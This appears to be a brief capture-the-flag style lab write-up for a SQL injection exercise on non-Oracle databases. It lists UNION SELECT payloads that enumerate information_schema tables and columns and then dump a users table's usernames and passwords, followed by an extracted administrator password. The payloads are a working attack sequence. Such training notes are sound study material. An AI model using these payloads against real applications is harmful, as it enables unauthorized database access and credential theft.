05 Lab: SQL injection attack, listing the database contents on non-Oracle databases

'+UNION+SELECT+'AAA','BBB'--
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_horosf'--
'+UNION+SELECT+username_iuhldq,+password_eazcur+FROM+users_horosf--

administrator
xphxerrutto3jpg7eaw2

rwrwerw

Previous04 Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft Next06 Lab: SQL injection attack, listing the database contents on Oracle

Last updated 6 months ago